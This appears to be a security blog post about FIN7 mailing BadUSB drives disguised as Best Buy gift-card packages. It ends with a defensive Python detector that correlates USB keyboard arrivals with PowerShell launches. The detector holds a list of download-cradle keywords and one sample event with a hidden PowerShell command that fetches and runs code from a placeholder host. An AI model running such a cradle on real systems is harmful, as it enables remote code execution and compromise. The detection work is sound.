
Hackers sending malicious USB drives using Best Buy gift cards


Hackers have been targeting various businesses with malware-infected USB devices. This is a new technique used by the FIN7 cyber criminal group to deliver the GRIFFON malware.

A client of the cybersecurity firm Trustwave received a package, supposedly from Best Buy, containing a loyalty reward in the form of a $50 gift card. The package also contained a USB drive that claimed to hold a list of products eligible for purchase with the gift card.

According to the FBI, the hackers have mailed similar packages to several businesses in the retail, restaurant and hotel industries, targeting employees in human resources, IT or executive management.

The FBI warns that the cyber criminals use the United States Postal Service (USPS) to mail packages containing items such as teddy bears or gift cards to the targeted employees.

The malicious drive is configured to imitate keystrokes that launch a PowerShell command to retrieve malware from a server controlled by the attacker. The USB device then contacts domains or IP addresses in Russia.

Trustwave analyzed this malicious USB activity and found two PowerShell commands that display a fake error message for the thumb drive and ultimately run a third-stage JavaScript payload capable of collecting system information and downloading further malware.

The hackers use multiple tools like Metasploit, Cobalt Strike, PowerShell scripts, Carbanak malware, Griffon backdoor, Boostwrite malware dropper, and RdfSniffer module with remote access capabilities to attain their goal.

BadUSB attacks are now common in penetration testing, and more flexible devices can be purchased for around $100.

FIN7 used a simple and cheap version that costs between $5 and $14, depending on the supplier and the shipping country. These devices had “HW-374” printed on the circuit board and were identified as an Arduino Leonardo, a board that is programmed to act as a keyboard/mouse out of the box. The keystrokes and mouse movements it sends can be customized using the Arduino IDE.

Connecting unknown USB devices to a workstation is a well-known bad practice, yet many users still do it.

Organizations need to take precautions against attacks via malicious USB drives by allowing only devices that have been vetted, based on their hardware ID, and denying all others.

Also, keeping PowerShell up to date and enabling its logging can help determine the attack vector and the steps that led to compromise.
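As an added example (not from the article or from Trustwave), the following Python sketches the correlation a defender could run over Windows Security logs once logging is enabled: a new, non-allowlisted keyboard-class USB device arrival followed within seconds by a PowerShell launch that downloads or runs encoded content. Event IDs 6416 (new external device recognized) and 4688 (process creation) are standard Windows Security events; the event records, hardware IDs and allowlist below are constructed for illustration.

```python
"""Correlate keyboard-class USB arrivals with suspicious PowerShell launches."""
from datetime import datetime

# Hardware IDs of vetted keyboards (constructed placeholder values).
ALLOWED_HWIDS = {"USB\\VID_046D&PID_C31C"}

# Command-line fragments typical of a download-and-execute PowerShell cradle.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
    "invoke-expression", "iex ", "-encodedcommand", "-enc ",
)


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def is_allowlisted(device_id):
    """A device is trusted only if its instance ID begins with a vetted hardware ID."""
    return any(device_id.upper().startswith(h) for h in ALLOWED_HWIDS)


def is_suspicious_powershell(cmdline):
    lowered = cmdline.lower()
    return "powershell" in lowered and any(m in lowered for m in DOWNLOAD_MARKERS)


def correlate(events, window_s=30):
    """Return (device_id, cmdline, seconds) for every suspicious PowerShell process
    created within window_s seconds after a non-allowlisted keyboard device appeared."""
    arrivals = [e for e in events if e["id"] == 6416
                and e["class"].lower() == "keyboard" and not is_allowlisted(e["device_id"])]
    launches = [e for e in events if e["id"] == 4688 and is_suspicious_powershell(e["cmdline"])]
    alerts = []
    for proc in launches:
        for dev in arrivals:
            delta = (parse_ts(proc["ts"]) - parse_ts(dev["ts"])).total_seconds()
            if 0 <= delta <= window_s:
                alerts.append((dev["device_id"], proc["cmdline"], delta))
    return alerts


# Constructed sample events: one vetted keyboard, one unknown keyboard-class device,
# one PowerShell download cradle four seconds later, and one benign PowerShell run.
SAMPLE_EVENTS = [
    {"id": 6416, "ts": "2020-03-26T09:14:02", "class": "Keyboard",
     "device_id": "USB\\VID_046D&PID_C31C\\5&1A2B3C4D&0&2"},
    {"id": 6416, "ts": "2020-03-26T09:20:10", "class": "Keyboard",
     "device_id": "USB\\VID_2341&PID_8036\\6&0EF12345&0&1"},
    {"id": 4688, "ts": "2020-03-26T09:20:14", "cmdline":
     "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a')\""},
    {"id": 4688, "ts": "2020-03-26T09:30:00", "cmdline": "powershell.exe -File C:\\ops\\inventory.ps1"},
]

if __name__ == "__main__":
    for device_id, cmdline, delta in correlate(SAMPLE_EVENTS):
        print(f"ALERT: {device_id} followed {delta:.0f}s later by: {cmdline}")
```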

Priyanka R
Cyber Security Enthusiast, Security Blogger, Technical Editor, Author at Cyber Safe News
